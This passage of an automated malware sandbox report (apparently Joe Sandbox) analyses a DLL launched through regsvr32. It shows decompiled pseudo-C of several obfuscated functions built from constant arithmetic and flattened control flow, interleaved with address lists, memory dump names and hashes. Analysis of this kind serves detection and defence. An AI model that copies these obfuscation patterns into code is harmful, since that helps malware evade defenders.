				return  *_t81(_a8, _t95, _a48, 0, _a36, _a56, 0, _a52, 0, __ecx, 0, _a4, _a8, _a12, _a16, _a20, _a24, _a28, 0, _a36, 0, _a44, _a48, _a52, _a56);
			}

0x10003f16
0x10003f3d
0x10003f42
0x10003f51
0x10003f54
0x10003f5b
0x10003f63
0x10003f64
0x10003f69
0x10003f70
0x10003f77
0x10003f7e
0x10003f83
0x10003f8a
0x10003f91
0x10003f9c
0x10003fa0
0x10003fa3
0x10003faa
0x10003fb1
0x10003fb8
0x10003fbc
0x10003fca
0x10003fcd
0x10003fec
0x1000400e

Strings

W, xrefs: 10003F77

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: W
API String ID: 0-1870275506
Opcode ID: f15bc33acc00823b995972debe4068c38736afdb8352c73f66b4d5ccc626db31
Instruction ID: 53dca63baaf72b2d4c068bbfa84f7cb00662d50e49042863baed0346e432e706
Opcode Fuzzy Hash: f15bc33acc00823b995972debe4068c38736afdb8352c73f66b4d5ccc626db31
Instruction Fuzzy Hash: 89311836900208FFDF05DF95DC468DEBFB6FB89300F508089FA10A6260D7719A51DB50

Uniqueness

Uniqueness Score: -1.00%

Function 10006A8D Relevance: 1.3, Strings: 1, Instructions: 72
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E10006A8D(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _t85;
				signed int _t98;

				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t85);
				_v40 = _v40 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v44 = 0x59bb3;
				_v16 = 0x27b406;
				_v16 = _v16 >> 0xa;
				_t98 = 6;
				_v16 = _v16 / _t98;
				_v16 = _v16 ^ 0x000001a7;
				_v32 = 0x4ee18f;
				_v32 = _v32 << 0xb;
				_v32 = _v32 ^ 0x770c4da0;
				_v28 = 0x719cc8;
				_v28 = _v28 * 0x21;
				_v28 = _v28 ^ 0x0eab865d;
				_v24 = 0xcf98bf;
				_v24 = _v24 * 0x72;
				_v24 = _v24 ^ 0x5c70bac6;
				_v8 = 0x9bc82e;
				_v8 = _v8 + 0xffff17ab;
				_v8 = _v8 + 0x83a9;
				_v8 = _v8 ^ 0xd136627a;
				_v8 = _v8 ^ 0xd1ac65f9;
				_v24 = 0x80a4f;
				_v24 = _v24 | 0x83408841;
				_v24 = _v24 ^ 0x834aadb5;
				_v8 = 0xd73291;
				_v8 = _v8 ^ 0x01897e2e;
				_v8 = _v8 * 0x45;
				_v8 = _v8 * 6;
				_v8 = _v8 ^ 0x368174ad;
				_v24 = 0xfdc159;
				_v24 = _v24 + 0xde59;
				_v24 = _v24 >> 6;
				_v24 = _v24 ^ 0x000ce223;
				_v20 = 0x384890;
				_v20 = _v20 + 0xd34c;
				_v20 = _v20 | 0x93bacbef;
				_v20 = _v20 ^ 0x93bff6d2;
				_v12 = 0x9cbe6a;
				_v12 = _v12 | 0x0dd8fed8;
				_v12 = _v12 << 6;
				_v12 = _v12 ^ 0x773f2d4d;
				return E100150B6(E1000645E(_t98), _v8, _a4, _v24, _v20, _v16, _v12);
			}

0x10006a93
0x10006a96
0x10006a97
0x10006a98
0x10006a9d
0x10006aa3
0x10006aa7
0x10006aae
0x10006ab5
0x10006abe
0x10006ac1
0x10006ac4
0x10006acb
0x10006ad2
0x10006ad6
0x10006add
0x10006ae8
0x10006aeb
0x10006af2
0x10006afd
0x10006b00
0x10006b07
0x10006b0e
0x10006b15
0x10006b1c
0x10006b23
0x10006b2a
0x10006b31
0x10006b38
0x10006b3f
0x10006b46
0x10006b51
0x10006b58
0x10006b5b
0x10006b62
0x10006b69
0x10006b70
0x10006b74
0x10006b7b
0x10006b82
0x10006b89
0x10006b90
0x10006b97
0x10006b9e
0x10006ba5
0x10006ba9
0x10006bda

Strings

M-?w, xrefs: 10006BA9

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: M-?w
API String ID: 0-3994043628
Opcode ID: d13f51f644a97f6bdc599be56d7e5cbd5b841445015ad360c0988201aef482b8
Instruction ID: ac4443af10e826e5c75f1bcb4b88a090928994d9fe330e42cb97091284b41fc0
Opcode Fuzzy Hash: d13f51f644a97f6bdc599be56d7e5cbd5b841445015ad360c0988201aef482b8
Instruction Fuzzy Hash: 0741AF75C0120EEBDF48DFE1DA4A5EEBBB1FB44318F208099D111BA260D3B54B589F95

Uniqueness

Uniqueness Score: -1.00%

Function 10010F7A Relevance: 1.3, Strings: 1, Instructions: 64
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E10010F7A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t68;
				signed int _t81;
				signed int _t82;
				signed int _t83;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t68);
				_v8 = 0x65a034;
				_v8 = _v8 + 0xffffa920;
				_v8 = _v8 ^ 0x51624c60;
				_v8 = _v8 ^ 0x26c8d1e7;
				_v8 = _v8 ^ 0x77cf54d3;
				_v20 = 0x994996;
				_v20 = _v20 << 0xa;
				_t81 = 0x62;
				_v20 = _v20 / _t81;
				_t82 = 0x22;
				_v20 = _v20 / _t82;
				_v20 = _v20 ^ 0x0007c57b;
				_v16 = 0x6de711;
				_t83 = 0x5b;
				_v16 = _v16 * 0x72;
				_v16 = _v16 / _t83;
				_v16 = _v16 * 0x35;
				_v16 = _v16 ^ 0x1c835f80;
				_v12 = 0x74d028;
				_v12 = _v12 + 0x740b;
				_v12 = _v12 + 0xffff6d53;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0x74bc9e49;
				_v28 = 0xc634bd;
				_v28 = _v28 * 0x23;
				_v28 = _v28 ^ 0x1b12ed92;
				_v24 = 0xce942b;
				_v24 = _v24 + 0xf659;
				_v24 = _v24 ^ 0x00c92063;
				return E10021BD6(_v20, _v16, _v12, _v8, _a8, _v28, _v24);
			}

0x10010f80
0x10010f83
0x10010f86
0x10010f87
0x10010f88
0x10010f8d
0x10010f96
0x10010f9d
0x10010fa4
0x10010fab
0x10010fb2
0x10010fb9
0x10010fc2
0x10010fc7
0x10010fcf
0x10010fd4
0x10010fd9
0x10010fe0
0x10010feb
0x10010fec
0x10010ff4
0x10010ffb
0x10010ffe
0x10011005
0x1001100c
0x10011013
0x1001101a
0x1001101e
0x10011025
0x10011030
0x10011033
0x1001103a
0x10011041
0x10011048
0x1001106f

Strings

`LbQ, xrefs: 10010F9D

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: `LbQ
API String ID: 0-675624188
Opcode ID: 70a4112934757df3369f4c45cd352a880fd0d2c8e524203ce92b79c5eae51f5f
Instruction ID: 0404ccdc5ab47cfb39aad9038d9d183ea8f31eef3146ef5691420e4e4dd18dda
Opcode Fuzzy Hash: 70a4112934757df3369f4c45cd352a880fd0d2c8e524203ce92b79c5eae51f5f
Instruction Fuzzy Hash: 4C310472D0020AEBDF08CFE5D9864AEFBB2FB44304F20C199D5156A260D3B55B55CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6DA5BFE8 Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction ID: 9eed7a78f737608ba807ecd1a03dcd48e0bbcf96bf71b28d97db072e2bb33e5c
Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction Fuzzy Hash: 41D14077C1E9B3468336812E449423EEB626FC1A5132FC3E1DCE43F68D963A5DA495D0

Uniqueness

Uniqueness Score: -1.00%

Function 6DA5BBC8 Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction ID: 2d4e29058a3a6afe9eaee5ee10af3e99fa230dac12461a72e0cfd06f37c7141b
Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction Fuzzy Hash: B2D1437BC1E9B34A8336812E409433EEA626FC165232EC7E1DCE43F289D53A5DA585D0

Uniqueness

Uniqueness Score: -1.00%

Function 6DA5B7BC Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction ID: 7d4a1d2c48df0bfc0c4e4019b28998652938cff0864d315469751afc704d9563
Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction Fuzzy Hash: 21C15277C1E9B34A8336812E805473EEA626FC165232FC7E1DCE43F28992375DA495D0

Uniqueness

Uniqueness Score: -1.00%

Function 6DA5B3E8 Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction ID: 436b10f71fc468b9c56b5d1e41b2d3d660b12ae1e45e723e473176b8337e7ee8
Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction Fuzzy Hash: 58C17177D1E9B34A8336812E409473EEE626FC175232EC3A1DCE43F689D6365DA096D0

Uniqueness

Uniqueness Score: -1.00%

Function 10011DA6 Relevance: .1, Instructions: 136
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E10011DA6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v60;
				void* _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t103;
				void* _t116;
				void* _t120;
				void* _t124;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				void* _t147;
				void* _t149;
				void* _t150;

				_t122 = _a16;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t103);
				_v76 = 0xb402e9;
				_t150 = _t149 + 0x18;
				asm("stosd");
				_t147 = 0;
				_t124 = 0x535e23b;
				asm("stosd");
				asm("stosd");
				_v80 = 0xc9a27a;
				_v80 = _v80 << 7;
				_v80 = _v80 ^ 0x64dd74e0;
				_v84 = 0xb388fd;
				_v84 = _v84 | 0x339c69d5;
				_v84 = _v84 ^ 0x33b02bcd;
				_v104 = 0xa00229;
				_v104 = _v104 << 0xa;
				_v104 = _v104 + 0xa4dd;
				_v104 = _v104 >> 6;
				_v104 = _v104 ^ 0x020ddab6;
				_v108 = 0xb873f6;
				_t143 = 0x59;
				_v108 = _v108 / _t143;
				_t144 = 0x1c;
				_v108 = _v108 * 0x5a;
				_v108 = _v108 >> 0xa;
				_v108 = _v108 ^ 0x00052d46;
				_v112 = 0x890e1;
				_v112 = _v112 >> 0xf;
				_v112 = _v112 / _t144;
				_t145 = 9;
				_v112 = _v112 * 0x5b;
				_v112 = _v112 ^ 0x0009cf7e;
				_v88 = 0xde8df8;
				_v88 = _v88 ^ 0x0d92f1a8;
				_v88 = _v88 + 0xfffff4b3;
				_v88 = _v88 ^ 0x0d469133;
				_v96 = 0x16ab72;
				_v96 = _v96 * 0x18;
				_v96 = _v96 << 0xd;
				_v96 = _v96 << 0x10;
				_v96 = _v96 ^ 0x000c2d44;
				_v100 = 0x289410;
				_v100 = _v100 / _t145;
				_v100 = _v100 ^ 0x06b4a1ea;
				_v100 = _v100 >> 7;
				_v100 = _v100 ^ 0x0000ed94;
				_v92 = 0x6b033c;
				_v92 = _v92 << 2;
				_v92 = _v92 + 0x4cb8;
				_v92 = _v92 ^ 0x01adefa4;
				while(_t124 != 0x39d5034) {
					if(_t124 == 0x535e23b) {
						_t124 = 0x6262e12;
						continue;
					} else {
						if(_t124 == 0x6262e12) {
							E10004603(_v80, _v84, _a12,  &_v60);
							_t124 = 0xd4f11ca;
							continue;
						} else {
							if(_t124 != 0xd4f11ca) {
								L10:
								__eflags = _t124 - 0x926a95f;
								if(__eflags != 0) {
									continue;
								}
							} else {
								_t120 = E10015167(_t122 + 0x24, _v104, _v108,  &_v60, _v112);
								_t150 = _t150 + 0xc;
								if(_t120 != 0) {
									_t124 = 0x39d5034;
									continue;
								}
							}
						}
					}
					return _t147;
				}
				_t116 = E1001E831( &_v60, _v88, __eflags, _t122 + 0x10, _v96, _v100, _v92);
				_t150 = _t150 + 0x10;
				__eflags = _t116;
				_t147 =  !=  ? 1 : _t147;
				__eflags = _t147;
				_t124 = 0x926a95f;
				goto L10;
			}

0x10011daa
0x10011db4
0x10011db5
0x10011dbc
0x10011dc3
0x10011dca
0x10011dcb
0x10011dcc
0x10011dd1
0x10011ddf
0x10011de2
0x10011de5
0x10011de7
0x10011df3
0x10011df4
0x10011df5
0x10011dfd
0x10011e02
0x10011e0a
0x10011e12
0x10011e1a
0x10011e22
0x10011e2a
0x10011e2f
0x10011e37
0x10011e3c
0x10011e44
0x10011e50
0x10011e55
0x10011e60
0x10011e63
0x10011e67
0x10011e6c
0x10011e74
0x10011e7c
0x10011e89
0x10011e92
0x10011e93
0x10011e97
0x10011e9f
0x10011ea7
0x10011eaf
0x10011eb7
0x10011ebf
0x10011ecc
0x10011ed0
0x10011ed5
0x10011eda
0x10011ee2
0x10011ef5
0x10011ef9
0x10011f01
0x10011f06
0x10011f0e
0x10011f16
0x10011f1b
0x10011f23
0x10011f2b
0x10011f35
0x10011f89
0x00000000
0x10011f37
0x10011f39
0x10011f7b
0x10011f82
0x00000000
0x10011f3b
0x10011f41
0x10011fba
0x10011fba
0x10011fc0
0x00000000
0x00000000
0x10011f43
0x10011f57
0x10011f5c
0x10011f61
0x10011f63
0x00000000
0x10011f63
0x10011f61
0x10011f41
0x10011f39
0x10011fcf
0x10011fcf
0x10011fa5
0x10011fac
0x10011fb0
0x10011fb2
0x10011fb2
0x10011fb5
0x00000000

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fba11e8c1a3eb2932fa2cb68dae1ac6445bd6b9610e3339c96435f826ff2de1
Instruction ID: 366b4fc0a5cd4f283cecd1a873c89ecb851bf27960891af01411a212dc21c44f
Opcode Fuzzy Hash: 2fba11e8c1a3eb2932fa2cb68dae1ac6445bd6b9610e3339c96435f826ff2de1
Instruction Fuzzy Hash: F25155711083819FD748DF25C58995BBBE1FBC8758F500A2DF58A9A260D374CA4A8F87

Uniqueness

Uniqueness Score: -1.00%

Function 100116AD Relevance: .1, Instructions: 135
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E100116AD(intOrPtr* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				void* _t116;
				intOrPtr _t126;
				void* _t130;
				intOrPtr* _t131;
				void* _t133;
				intOrPtr* _t148;
				intOrPtr _t149;
				signed int _t150;
				signed int _t151;
				signed int _t152;
				signed int* _t155;

				_push(_a8);
				_t148 = __edx;
				_t131 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t116);
				_v44 = 0xf71bb7;
				_t149 = 0;
				_v40 = 0;
				_t155 =  &(( &_v92)[4]);
				_v48 = 0xf47695;
				_v48 = _v48 << 0xb;
				_t133 = 0x1432c4;
				_v48 = _v48 ^ 0xa3b4a800;
				_v68 = 0x9fc999;
				_v68 = _v68 ^ 0xe8772f12;
				_v68 = _v68 >> 7;
				_v68 = _v68 ^ 0x01d1d1cd;
				_v56 = 0xa576d4;
				_v56 = _v56 | 0xcf899228;
				_v56 = _v56 ^ 0xcfa3a3ad;
				_v60 = 0xfdc0dd;
				_v60 = _v60 << 9;
				_v60 = _v60 ^ 0xfb8e5ed5;
				_v92 = 0xafc569;
				_v92 = _v92 ^ 0x61d42c87;
				_v92 = _v92 << 0xe;
				_v92 = _v92 | 0x9c2962d0;
				_v92 = _v92 ^ 0xfe7efba8;
				_v64 = 0x97f705;
				_t150 = 0x11;
				_v64 = _v64 / _t150;
				_v64 = _v64 ^ 0x000ea2be;
				_v80 = 0x5c5e98;
				_v80 = _v80 | 0xfc5f8d70;
				_t151 = 0x2a;
				_v80 = _v80 * 0x61;
				_v80 = _v80 << 0xd;
				_v80 = _v80 ^ 0x7b94b168;
				_v72 = 0x202dfd;
				_v72 = _v72 >> 9;
				_v72 = _v72 | 0x1b027f06;
				_v72 = _v72 ^ 0x1b09dcd6;
				_v76 = 0x21e08c;
				_v76 = _v76 >> 2;
				_v76 = _v76 + 0xffff2bd8;
				_v76 = _v76 ^ 0x00042bf5;
				_v84 = 0xcc4291;
				_v84 = _v84 + 0x447f;
				_v84 = _v84 ^ 0x10ab6ec1;
				_v84 = _v84 / _t151;
				_v84 = _v84 ^ 0x0061adf5;
				_v88 = 0xb1019d;
				_v88 = _v88 | 0x56204d9e;
				_v88 = _v88 + 0x1293;
				_v88 = _v88 | 0xf5b36b26;
				_v88 = _v88 ^ 0xf7b8cc08;
				_v52 = 0xde6f58;
				_t152 = 0xd;
				_v52 = _v52 / _t152;
				_v52 = _v52 ^ 0x001999c7;
				while(_t133 != 0x1432c4) {
					if(_t133 == 0x5f82c05) {
						_t126 =  *0x1002420c; // 0x0
						E1001595C(_v80, _v72, _v76,  *_t131, _v84, _v88,  *((intOrPtr*)(_t131 + 4)),  *((intOrPtr*)(_t126 + 0x50)), _v48,  &_v36, _t133, _t133, _v52);
						_t149 =  ==  ? 1 : _t149;
					} else {
						if(_t133 != 0x7d6a30f) {
							L7:
							if(_t133 != 0x9b98049) {
								continue;
							} else {
							}
						} else {
							_push( &_v36);
							_t130 = E1000E379(_v56,  *_t148, _v60, _t133,  *((intOrPtr*)(_t148 + 4)), _v92, _v64);
							_t155 =  &(_t155[6]);
							if(_t130 != 0) {
								_t133 = 0x5f82c05;
								continue;
							}
						}
					}
					return _t149;
				}
				_t133 = 0x7d6a30f;
				goto L7;
			}

0x100116b4
0x100116b8
0x100116ba
0x100116bc
0x100116c0
0x100116c1
0x100116c2
0x100116c7
0x100116cf
0x100116d1
0x100116d5
0x100116d8
0x100116e2
0x100116e7
0x100116ec
0x100116f4
0x100116fc
0x10011704
0x10011709
0x10011711
0x10011719
0x10011721
0x10011729
0x10011731
0x10011736
0x1001173e
0x10011746
0x1001174e
0x10011753
0x1001175b
0x10011763
0x10011771
0x10011776
0x1001177c
0x10011784
0x1001178c
0x10011799
0x1001179c
0x100117a0
0x100117a5
0x100117ad
0x100117b5
0x100117ba
0x100117c2
0x100117ca
0x100117d2
0x100117d7
0x100117df
0x100117e7
0x100117ef
0x100117f7
0x10011807
0x1001180b
0x10011813
0x1001181b
0x10011823
0x1001182b
0x10011833
0x1001183b
0x10011847
0x1001184f
0x10011853
0x1001185b
0x10011865
0x100118b8
0x100118d9
0x100118ea
0x10011867
0x1001186d
0x1001189f
0x100118a5
0x00000000
0x00000000
0x100118a7
0x1001186f
0x10011873
0x1001188a
0x1001188f
0x10011894
0x10011896
0x00000000
0x10011896
0x10011894
0x1001186d
0x100118f6
0x100118f6
0x1001189a
0x00000000

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36e9f81f13546fedfc338ea426f0853513bf8dd4c502baaceb4ae30be871092d
Instruction ID: 49cda6ca5c7ff8361d54192dd27f03845758af76b428b1f07d603a773a2ab816
Opcode Fuzzy Hash: 36e9f81f13546fedfc338ea426f0853513bf8dd4c502baaceb4ae30be871092d
Instruction Fuzzy Hash: 32512471108340AFC748CF65C88981BBFE1FBC8788F908A1DF5A596260D7B1CA598F86

Uniqueness

Uniqueness Score: -1.00%

Function 10010C7C Relevance: .1, Instructions: 106
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E10010C7C(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				void* _t115;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				void* _t138;

				_push(0x104);
				_push(_a12);
				_v52 = 0x104;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(0x104);
				_v8 = 0x13c78e;
				_v8 = _v8 >> 2;
				_t138 = 0;
				_v8 = _v8 >> 3;
				_t121 = 0x7a;
				_v8 = _v8 * 0x55;
				_v8 = _v8 ^ 0x003499ec;
				_v24 = 0xdfb2f6;
				_v24 = _v24 + 0xffff4862;
				_v24 = _v24 / _t121;
				_v24 = _v24 ^ 0x0001d3e5;
				_v16 = 0x76eef1;
				_t122 = 0x48;
				_v16 = _v16 / _t122;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 ^ 0x00091746;
				_v12 = 0xb294c5;
				_v12 = _v12 | 0xafd94234;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0xd6f62ee3;
				_v36 = 0xb39e92;
				_v36 = _v36 ^ 0x936a16cb;
				_v36 = _v36 ^ 0x93d4a381;
				_v28 = 0xab2ac3;
				_t123 = 0x52;
				_v28 = _v28 / _t123;
				_v28 = _v28 << 0xa;
				_v28 = _v28 ^ 0x085fadcf;
				_v40 = 0x6b4f00;
				_v40 = _v40 >> 9;
				_v40 = _v40 ^ 0x00047f52;
				_v20 = 0x63ee13;
				_v20 = _v20 >> 0xa;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x0630b076;
				_v48 = 0xf9508e;
				_v48 = _v48 + 0xffff5b3e;
				_v48 = _v48 ^ 0x00f843a0;
				_v44 = 0x110966;
				_v44 = _v44 * 0x59;
				_v44 = _v44 ^ 0x05e2225d;
				_v32 = 0x6cc25d;
				_v32 = _v32 << 0xa;
				_v32 = _v32 + 0x6bb9;
				_v32 = _v32 ^ 0xb30a220f;
				_t115 = E1000F43B(_v8, _a12);
				_t137 = _t115;
				if(_t115 != 0) {
					_t138 = E100114DA(_v28, _a4, _v24, _t137, _v40,  &_v52, _v20);
					E1001E373(_v48, _t137, _v44, _v32);
				}
				return _t138;
			}

0x10010c89
0x10010c8a
0x10010c8d
0x10010c90
0x10010c93
0x10010c96
0x10010c97
0x10010c98
0x10010c9d
0x10010ca6
0x10010caa
0x10010cac
0x10010cb6
0x10010cb9
0x10010cbc
0x10010cc3
0x10010cca
0x10010cd8
0x10010cdb
0x10010ce2
0x10010cec
0x10010cf1
0x10010cf6
0x10010cfa
0x10010d01
0x10010d08
0x10010d0f
0x10010d13
0x10010d1a
0x10010d21
0x10010d28
0x10010d2f
0x10010d39
0x10010d42
0x10010d45
0x10010d49
0x10010d50
0x10010d57
0x10010d5b
0x10010d62
0x10010d69
0x10010d6d
0x10010d71
0x10010d78
0x10010d7f
0x10010d86
0x10010d8d
0x10010d98
0x10010d9b
0x10010da2
0x10010da9
0x10010dad
0x10010db4
0x10010dc7
0x10010dcc
0x10010dd3
0x10010df3
0x10010dfb
0x10010e00
0x10010e0a

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: ca96df72b924741dce1d021307a68c12b6ab0566e7dc521bd9ec813d4828c05b
Instruction ID: b7eabb461747b1438ed0eb9758693e9731e1cccfb6938a7dff90e2e0fd1f213f
Opcode Fuzzy Hash: ca96df72b924741dce1d021307a68c12b6ab0566e7dc521bd9ec813d4828c05b
Instruction Fuzzy Hash: 684111B1D00209ABDF09DFE5C94A8EEFBB5FB44304F208059E925BA260D3B55A55CFA4

Uniqueness

